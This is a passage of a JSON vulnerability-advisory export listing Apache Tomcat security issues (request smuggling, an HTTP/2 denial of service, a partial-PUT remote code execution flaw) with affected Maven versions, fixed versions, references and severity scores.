"https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2868" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ee3af8a43cb019e7898c9330cc8e73306553a27f2e4735dfb522d39%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ee3af8a43cb019e7898c9330cc8e73306553a27f2e4735dfb522d39@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d15316dfb4adf75d96d394745f8037533fa3bcc1ac8f619bf5c044c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d15316dfb4adf75d96d394745f8037533fa3bcc1ac8f619bf5c044c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722090623.GA92700%40minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201808.mbox/%3C0c616b4d-4e81-e7f8-b81d-1bb4c575aa33%40apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:12Z", "nvd_published_at": "2018-08-02T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-767j-jfh2-jvrc", "published": "2020-02-28T01:10:58Z", "modified": "2024-02-21T05:31:17.449525Z", "aliases": [ "CVE-2019-17569" ], "summary": "Potential HTTP request smuggling in Apache Tomcat", "details": "The refactoring present in Apache Tomcat versions 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.98" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.48" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.5.49", "8.5.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.28" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.29", "9.0.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.98" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.48" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.5.49", "8.5.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.28" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.29", "9.0.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17569" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88def002c5c78534674ca67472e035099fbe088813d50062094a1390%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0005" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T16:19:11Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7w75-32cg-r6g2", "published": "2024-03-13T18:31:34Z", "modified": "2025-10-29T15:11:35.481591Z", "aliases": [ "BIT-tomcat-2024-24549", "CVE-2024-24549" ], "related": [ "CGA-g2x6-g84w-c6fq", "CGA-g7h3-55hg-6wrj", "CGA-mr75-947f-r7wp" ], "summary": "Apache Tomcat Denial of Service due to improper input validation vulnerability for HTTP/2 requests", "details": "Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.\n\nUsers are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M17" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0-M16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.19" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.86" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.85", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.99" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.98", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.99" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.98", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.86" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.85", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.19" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M17" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0-M16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24549" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0cac540a882220231ba7a82330483cbd5f6b1f96" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/810f49d5ff6d64b704af85d5b8d0aab9ec3c83f5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8e03be9f2698f2da9027d40b9e9c0c9429b74dc0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d07c82194edb69d99b438828fe2cbfadbb207843" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UWIS5MMGYDZBLJYT674ZI5AWFHDZ46B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/736G4GPZWS2DSQO5WKXO3G6OMZKFEK55" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240402-0002" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/13/3" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T16:27:53Z", "nvd_published_at": "2024-03-13T16:15:29Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-83qj-6fr2-vhqg", "published": "2025-03-10T18:31:56Z", "modified": "2025-10-22T19:55:27.684619Z", "aliases": [ "BIT-tomcat-2025-24813", "CVE-2025-24813" ], "related": [ "CGA-3gj2-76vf-63rm" ], "summary": "Apache Tomcat: Potential RCE and/or information disclosure and/or information corruption with partial PUT", "details": "Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nIf all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:\n- writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads\n- attacker knowledge of the names of security sensitive files being uploaded\n- the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- application was using Tomcat's file based session persistence with the default storage location\n- application included a library that may be leveraged in a deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.35" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.99" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.35" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", 